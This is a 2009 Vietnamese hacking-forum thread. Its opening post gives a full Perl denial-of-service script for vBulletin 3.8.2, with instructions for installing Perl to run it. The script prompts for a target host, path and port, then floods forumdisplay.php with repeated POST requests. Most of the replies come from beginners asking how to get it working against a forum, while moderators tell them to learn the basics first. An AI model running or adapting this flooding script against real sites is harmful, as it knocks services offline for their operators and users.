| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
22/06/2009 23:05:00 (+0700) | #1 | 184289 |
![[Avatar]](/hvaonline/images/avatar/a056749f32501d21492f749ecb188db8.png "[Avatar]")
|
holiganvn
Member
![[Minus]](/hvaonline/templates/viet/images/minus.gif "[Minus]") |
0 |
![[Plus]](/hvaonline/templates/viet/images/plus.gif "[Plus]")
|
|
Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline
|
|
Code:
#!usr/bin/perl
#vBulletin® Version 3.8.2 Denial of Service Exploit
#ea$y Laster
########################################################################
# Modules #
########################################################################
use IO::SOCKET; # Object interface #
########################################################################
if (@ARGV<1){
print"
########################################################################
## _ _ _ _ ##
##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_ ##
##| _| -_| .'| |___| | | _| -_| _| | -_| _| ##
##|_| |___|__,|_|_|_| |_|_|_|_| |___|_| |_|_|___|_| ##
## ##
########################################################################
########################################################################
## ## ##
##->vBulletin® Version 3.8.2<- ## ##
## ## ##
##Enter these values ## ##
##1.Target ##[*] www.Target.com ##
##2.Board ##[*] vbulletin ##
##3.Vulnerability ##[*] forumdisplay.php?f= ##
##4.Execution length/timeout ##[*] 9999999999999999 ##
##5.Port ##[*] 80 ##
########################################################################
\a";}
$block = "
########################################################################";
$fehler = "Error!Error!Error!Error";
$x =0;
print"$block\n";
print q(Target->);
chomp($ziel =<STDIN>);
if ($ziel eq""){
die "$fehler\a\n";}
print"$block\n";
print"$block\n";
print q(Path->);
chomp($path =<STDIN>);
if ($path eq "") {
die "$fehler !\a\n";}
print"$block\n";
print"$block\n";
print "Vulnerability\n";
print"forumdisplay.php?f=\n";
print"->\n";
chomp($vul =<STDIN>);
if ($vul eq "") {
die "$fehler !\a\n";}
print"$block\n";
print"$block\n";
print q(Time->);
chomp($flood =<STDIN>);
if ($flood eq "") {
die "$fehler !\a\n";}
print"$block\n";
print"$block\n";
print q(Port->);
chomp($port =<STDIN>);
if ($port eq ""){
die "$fehler \n";}
print"$block\n";
print q(Send "start"->);
chomp($start =<STDIN>);
if ($start eq "") {
die "$fehler\n";}
print "$block\a\n";
print "[+]Checking Data \n";
print "[*]Checking Target : $ziel\n";
print "[*]Checking Board : $path\n";
print "[*]Checking Port : $port\n";
print "$block\n";
if($start == 1){
while($x != 0000){
$x++;}
}elsif ($start == start){
while($x != $flood)
{
$postit = "$ziel"."$path"."$vul";
$lrg = length $postit;
$sock = new IO::Socket::INET (
PeerAddr => "$ziel",
PeerPort => "$port",
Proto => "tcp",
);
print $sock "POST $path$vul HTTP/1.1\n";
print $sock "Host: $ziel\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $ziel\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20070421 Firefox/2.0.0\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "->BLACKOUT<-";
$x++;
}
}else{
die "Error - can't connect to target $ziel !\n";
}
cài perl cho win
http://www.activestate.com/ActivePerl/
cài perl cho linux:
vào ter gõ:
Code:
apt-get install libio-socket-inet6-perl
sudo perl -MCPAN -e shell
install IO::Socket::INET6
perl -MCPAN -e 'install IO::Socket::INET6'
make
make test
sudo make install
hoặc:
http://www.perl.com/CPAN/src/perl-5.6.2.tar.gz 
|
|
HaCk t0 LeArN,N0t LeArN t0 HaCk
|
|
 |
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
10/07/2009 04:51:56 (+0700) | #2 | 185892 |
![[Avatar]](/hvaonline/images/avatar/3c6bc00b731ca058633a05e00a550724.jpeg "[Avatar]")
|
Shikuro
Member
|
|
0 |
|
|
Joined: 06/07/2009 21:01:10
Messages: 17
Offline
|
|
Mình dùng linux, đã install như trên, tuy nhiên vẫn bị
Can't locate IO/SOCKET.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at a.pl line 7.
BEGIN failed--compilation aborted at a.pl line 7.
Mong bạn giúp mình khắc phục |
|
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
10/07/2009 06:07:31 (+0700) | #3 | 185900 |
|
holiganvn
Member
|
|
0 |
|
|
Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline
|
|
Shikuro wrote:
Mình dùng linux, đã install như trên, tuy nhiên vẫn bị
Can't locate IO/SOCKET.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at a.pl line 7.
BEGIN failed--compilation aborted at a.pl line 7.
Mong bạn giúp mình khắc phục
vào ter gõ:
Code:
sudo apt-get install perl
|
|
HaCk t0 LeArN,N0t LeArN t0 HaCk
|
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
10/07/2009 16:16:25 (+0700) | #4 | 185954 |
|
Shikuro
Member
|
|
0 |
|
|
Joined: 06/07/2009 21:01:10
Messages: 17
Offline
|
|
| Đã tìm ra nơi phát sinh lỗi, trong code SOCKET trong máy là Socket.pm +_+ |
|
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
10/07/2009 17:16:24 (+0700) | #5 | 185956 |
Kaito Kid X
Member
|
|
0 |
|
|
Joined: 09/09/2004 02:00:08
Messages: 9
Offline
|
|
Ạnh ơi cho em hỏi, như em thấy thì đây là cái bug trên milworn
em còn là newbe nên không biết gì nhiều
muốn hỏi anh là sao anh biết đoạn mã trên là perk trong đó nó đâu có ghi gì đâu?
em cảm ơn anh nhiều |
|
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
10/07/2009 18:32:22 (+0700) | #6 | 185957 |
![[Avatar]](/hvaonline/images/avatar/089f41810321eefc3f4eef5d4a388e42.png "[Avatar]")
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
Kaito Kid X wrote:
Ạnh ơi cho em hỏi, như em thấy thì đây là cái bug trên milworn
em còn là newbe nên không biết gì nhiều
muốn hỏi anh là sao anh biết đoạn mã trên là perk trong đó nó đâu có ghi gì đâu?
em cảm ơn anh nhiều
Ở trên đầu của đoạn script có dòng:
#!usr/bin/perl
PS: Cố gắng gõ cho đúng từ. Câu cú cho rõ ràng. Gõ có một đoạn ngắn như thế mà đầy lỗi. |
|
| What bringing us together is stronger than what pulling us apart. |
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
10/07/2009 19:23:00 (+0700) | #7 | 185959 |
![[Avatar]](/hvaonline/images/avatar/de1737f4e8ef91bb48c9347952e2ddb5.jpg "[Avatar]")
|
ltcofdream
Member
|
|
0 |
|
|
Joined: 25/06/2009 15:29:59
Messages: 4
Location: Nơi không biết gì
Offline
|
|
Câu nào cũng sai thế là bị anh conmale chỉ dậy rồi . Là newbie thi lên milw0rm làm gì cho đau đầu .  |
|
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
10/07/2009 19:49:35 (+0700) | #8 | 185960 |
|
holiganvn
Member
|
|
0 |
|
|
Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline
|
|
Kaito Kid X wrote:
Ạnh ơi cho em hỏi, như em thấy thì đây là cái bug trên milworn
em còn là newbe nên không biết gì nhiều
muốn hỏi anh là sao anh biết đoạn mã trên là perk trong đó nó đâu có ghi gì đâu?
em cảm ơn anh nhiều
bạn vào google tìm kiếm: "how to use perl exploit" để biết cách sử dụng |
|
HaCk t0 LeArN,N0t LeArN t0 HaCk
|
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
10/07/2009 22:07:08 (+0700) | #9 | 185971 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
ltcofdream wrote:
Câu nào cũng sai thế là bị anh conmale chỉ dậy rồi . Là newbie thi lên milw0rm làm gì cho đau đầu .
dậy: thức dậy.
dạy: dạy bảo.
Là newbie thì càng thích lên milw0rm vì nó có khối "mì ăn liền" để làm tại chỗ. |
|
| What bringing us together is stronger than what pulling us apart. |
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
12/07/2009 12:01:14 (+0700) | #10 | 186185 |
sovietw0rm
Member
|
|
0 |
|
|
Joined: 14/02/2008 18:05:38
Messages: 7
Offline
|
|
| cái code perl trên milw0rm có thể áp dụng cho các code khác không chỉ có vbb Version 3.8.2 này đâu. Code này nó sẽ gửi nhiều request đến 1 link tại đó sử dụng nhiều truy vấn sql hay có các truy vấn đòi hỏi nhiều tài nguyên để sử lý nhằm mục đích làm cho Database management System của victim quá tải dẫn đến bị die. Thông thường là vậy. |
|
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
07/08/2009 12:41:58 (+0700) | #11 | 188963 |
![[Avatar]](/hvaonline/images/avatar/7682654e739d4f95d925fa6995182038.png "[Avatar]")
|
RECON
Member
|
|
0 |
|
|
Joined: 16/06/2009 19:10:08
Messages: 6
Offline
|
|
| em thử cái này,mà sao nó có DDOS đc đâu??? |
|
___ [COLOR="Red"][FONT="System"][SIZE="6"]Hack To Learn,Don't Learn To Hack[/SIZE][/FONT][/COLOR] _____
Rapid Leech
[URL="http://ser1.ongkinhviet.com"][COLOR="Black"]http://ser1.ongkinhviet.com[/COLOR][/URL]
[URL="http://ser2.ongkinhviet.com"][CO |
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
12/08/2009 08:07:03 (+0700) | #12 | 189640 |
noname89
Member
|
|
0 |
|
|
Joined: 21/06/2008 01:07:40
Messages: 4
Offline
|
|
Em cai` perl xong chạy nó báo lỗi thế này. Anh em nào biết chỉ với.
Can't locate IO/Socket/SSL.pm in @INC (@INC contains: /usr/local/lib/perl5/site_perl/5.10.0/i386-linux-thread-multi /usr/local/lib/perl5/site_perl/5.10.0 /usr/lib/perl5/vendor_perl/5.10.0/i386-linux-thread-multi /usr/lib/perl5/vendor_perl/5.10.0 /usr/lib/perl5/vendor_perl /usr/lib/perl5/5.10.0/i386-linux-thread-multi /usr/lib/perl5/5.10.0 /usr/lib/perl5/site_perl .) at apache.pl line 4.
BEGIN failed--compilation aborted at apache.pl line 4.
Mình đang dùng Fedora. |
|
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
12/08/2009 08:22:07 (+0700) | #13 | 189641 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
noname89 wrote:
Em cai` perl xong chạy nó báo lỗi thế này. Anh em nào biết chỉ với.
Can't locate IO/Socket/SSL.pm in @INC (@INC contains: /usr/local/lib/perl5/site_perl/5.10.0/i386-linux-thread-multi /usr/local/lib/perl5/site_perl/5.10.0 /usr/lib/perl5/vendor_perl/5.10.0/i386-linux-thread-multi /usr/lib/perl5/vendor_perl/5.10.0 /usr/lib/perl5/vendor_perl /usr/lib/perl5/5.10.0/i386-linux-thread-multi /usr/lib/perl5/5.10.0 /usr/lib/perl5/site_perl .) at apache.pl line 4.
BEGIN failed--compilation aborted at apache.pl line 4.
Mình đang dùng Fedora.
Thiếu phần màu đỏ và thiếu cụ thể cái gì thì thử tìm hiểu xem sao. Muốn làm héc cờ mà không nắm mấy cái này thì bó tay. |
|
| What bringing us together is stronger than what pulling us apart. |
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
12/08/2009 09:27:10 (+0700) | #14 | 189652 |
9x9=81??
Elite Member
|
|
0 |
|
|
Joined: 26/06/2005 12:23:59
Messages: 92
Offline
|
|
Chắc viết lại thành C ( không phải C# nhé, mất công báo lỗi thiếu framework ) rồi compile thì mấy bạn này mới chạy được quá 
|
|
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
12/08/2009 20:47:13 (+0700) | #15 | 189734 |
noname89
Member
|
|
0 |
|
|
Joined: 21/06/2008 01:07:40
Messages: 4
Offline
|
|
| héc j đâu ạ . Em chạy thằng này trên win thì nó báo là ko thể mở. Còn chạy trên linux thì báo lỗi như thế. bó tay với thằng này quá |
|
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
19/08/2009 00:01:14 (+0700) | #16 | 190415 |
vinh_thekiller
Member
|
|
0 |
|
|
Joined: 22/02/2008 20:30:19
Messages: 6
Offline
|
|
| Em cũng thích học hack lắm nhưng hiện tại vốn kiến thức chưa đủ, nhất là tiếng Anh kìa. Mấy anh đưa mấy trang nước ngoài vào, nhìn thấy đã oải rồi. Ở forum HVA có chỗ nào chuyên cho newbie ko hả mấy anh? |
|
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
19/08/2009 16:55:44 (+0700) | #17 | 190481 |
|
holiganvn
Member
|
|
0 |
|
|
Joined: 08/05/2009 19:29:45
Messages: 370
Location: Cố Đô Huế
Offline
|
|
vinh_thekiller wrote:
Em cũng thích học hack lắm nhưng hiện tại vốn kiến thức chưa đủ, nhất là tiếng Anh kìa. Mấy anh đưa mấy trang nước ngoài vào, nhìn thấy đã oải rồi. Ở forum HVA có chỗ nào chuyên cho newbie ko hả mấy anh?
có đấy bạn,mấy cái Sticky ở đầu mỗi phân mục đó  |
|
HaCk t0 LeArN,N0t LeArN t0 HaCk
|
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
23/08/2009 06:47:56 (+0700) | #18 | 190871 |
vinh_thekiller
Member
|
|
0 |
|
|
Joined: 22/02/2008 20:30:19
Messages: 6
Offline
|
|
| Cho em hỏi thêm chút. Với cái script kia thì khi chạy, cái phần "Path" gõ là "forum" hay "/forum/" vậy? Cả cái "forumdisplay?f=" thì gõ nguyên cả đoạn đó vào rồi thêm id forum bất kì hay forum nào vậy? Em thử rồi nhưng đợi mãi chẳng thấy cái forum thử nghiệm die j cả... |
|
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
23/08/2009 07:09:38 (+0700) | #19 | 190872 |
![[Avatar]](/hvaonline/images/avatar/3f44f3018ff71ff4a7d22a98f3babb55.png "[Avatar]")
|
quanta
Moderator
|
Joined: 28/07/2006 14:44:21
Messages: 7265
Location: $ locate `whoami`
Offline
|
|
vinh_thekiller wrote:
Cho em hỏi thêm chút. Với cái script kia thì khi chạy, cái phần "Path" gõ là "forum" hay "/forum/" vậy? Cả cái "forumdisplay?f=" thì gõ nguyên cả đoạn đó vào rồi thêm id forum bất kì hay forum nào vậy? Em thử rồi nhưng đợi mãi chẳng thấy cái forum thử nghiệm die j cả...
Thôi thì chịu khó học Perl vậy, học đến khi nào có thể viết được những đoạn mã tương tự như trên thì mới thấy thú vị chứ vẫn thích kiểu mỳ ăn liền, học trên ngọn thế này thì không thu được cái gì cả. |
|
| Let's build on a great foundation! |
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
23/08/2009 07:10:11 (+0700) | #20 | 190873 |
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
vinh_thekiller wrote:
Em cũng thích học hack lắm nhưng hiện tại vốn kiến thức chưa đủ, nhất là tiếng Anh kìa. Mấy anh đưa mấy trang nước ngoài vào, nhìn thấy đã oải rồi. Ở forum HVA có chỗ nào chuyên cho newbie ko hả mấy anh?
HVA là forum không phân biệt newbie hay oldie cho nên chẳng có cái gì chuyên cho newbie cả. |
|
| What bringing us together is stronger than what pulling us apart. |
|
| [Announcement] vBulletin® Version 3.8.2 Denial of Service Exploit |
23/08/2009 21:55:32 (+0700) | #21 | 190940 |
intellirookie
Member
|
|
0 |
|
|
Joined: 07/08/2009 03:56:56
Messages: 9
Offline
|
|
| em khuyên các bác tự xưng là newbie nên đọc qua loạt bài "Những cuộc đối thoại với rookie" trong Phòng đọc của HVA cho thật kỹ, đừng ở đây post bài lung tung kẻo bị Anh già khó tính châm, còn anh quanta thì phải trả lời từng câu một tội ảnh quá |
|
|
| Users currently in here |
|
1 Anonymous
|
|
Powered by JForum - Extended by HVAOnline
hvaonline.net | hvaforum.net | hvazone.net | hvanews.net | vnhacker.org
1999 - 2013 ©
v2012|0504|218|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
Thông tin new bugs và exploits
![[Profile]](/hvaonline/templates/viet/images/en_US/icon_profile.gif "[Profile]"){kind=icon}
![[PM]](/hvaonline/templates/viet/images/en_US/icon_pm.gif "[PM]"){kind=icon}
![[Locked]](/hvaonline/templates/viet/images/en_US/reply_locked.gif "[Locked]")
![[Up]](/hvaonline/templates/viet/images/en_US/icon_up.gif "[Up]"){kind=icon}
![[Print Copy]](/hvaonline/templates/viet/images/en_US/icon_print.gif "[Print Copy]"){kind=icon}
![[digg]](/hvaonline/templates/viet/images/digg.gif "[digg]")
![[delicious]](/hvaonline/templates/viet/images/delicious.gif "[delicious]")
![[google]](/hvaonline/templates/viet/images/google.gif "[google]")
![[yahoo]](/hvaonline/templates/viet/images/yahoo.gif "[yahoo]")
![[technorati]](/hvaonline/templates/viet/images/technorati.gif "[technorati]")
![[reddit]](/hvaonline/templates/viet/images/reddit.gif "[reddit]")
![[stumbleupon]](/hvaonline/templates/viet/images/stumbleupon.gif "[stumbleupon]")